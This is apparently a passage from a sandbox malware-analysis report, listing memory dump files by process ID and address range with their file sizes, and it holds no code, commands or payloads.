                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                            • memory/3896-365-0x0000000005F80000-0x00000000062D4000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                            • memory/3896-366-0x0000000006590000-0x00000000065AE000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                            • memory/3896-367-0x0000000006620000-0x000000000666C000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                            • memory/3896-380-0x0000000006B40000-0x0000000006B72000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              200KB

                                                                                                                                                                                                                                                                                            • memory/3896-436-0x0000000007BE0000-0x0000000007BE8000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                            • memory/3896-435-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                                            • memory/3896-434-0x0000000007B00000-0x0000000007B14000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                            • memory/3896-432-0x0000000007AF0000-0x0000000007AFE000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              56KB

                                                                                                                                                                                                                                                                                            • memory/3896-431-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                            • memory/3896-381-0x000000006E7C0000-0x000000006E80C000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                            • memory/3896-421-0x0000000007B30000-0x0000000007BC6000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              600KB

                                                                                                                                                                                                                                                                                            • memory/3896-407-0x0000000007940000-0x000000000794A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                            • memory/3896-393-0x0000000007610000-0x00000000076B3000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              652KB

                                                                                                                                                                                                                                                                                            • memory/3896-394-0x0000000007F90000-0x000000000860A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                            • memory/3948-1018-0x0000000000F00000-0x0000000001D22000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              14.1MB

                                                                                                                                                                                                                                                                                            • memory/4032-14-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                            • memory/4224-1085-0x0000000000700000-0x0000000000AFE000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                            • memory/4364-1041-0x0000000000D50000-0x0000000001B5E000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              14.1MB

                                                                                                                                                                                                                                                                                            • memory/4504-472-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                            • memory/4504-430-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                            • memory/4508-1040-0x0000000000040000-0x0000000000058000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              96KB

                                                                                                                                                                                                                                                                                            • memory/4544-1395-0x000000006E0E0000-0x000000006E3CD000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.9MB

                                                                                                                                                                                                                                                                                            • memory/4828-952-0x00000214F7060000-0x00000214F706A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                            • memory/4828-954-0x00000214F72C0000-0x00000214F72DC000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                                            • memory/4828-951-0x00000214F70A0000-0x00000214F7155000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              724KB

                                                                                                                                                                                                                                                                                            • memory/4828-950-0x00000214F7080000-0x00000214F709C000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                                            • memory/4828-959-0x00000214F7300000-0x00000214F730A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                            • memory/4828-958-0x00000214F72B0000-0x00000214F72B6000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              24KB

                                                                                                                                                                                                                                                                                            • memory/4828-957-0x00000214F72A0000-0x00000214F72A8000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                            • memory/4828-956-0x00000214F72E0000-0x00000214F72FA000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                                            • memory/4828-955-0x00000214F7070000-0x00000214F707A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                            • memory/5064-1243-0x0000000000570000-0x0000000000A3A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                            • memory/5292-1506-0x00007FF6A5D70000-0x00007FF6A6179000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                            • memory/5292-1510-0x00007FF6A5D70000-0x00007FF6A6179000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                            • memory/5932-1511-0x00007FF62E560000-0x00007FF62E969000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                            • memory/5932-1606-0x00007FF62E560000-0x00007FF62E969000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4.0MB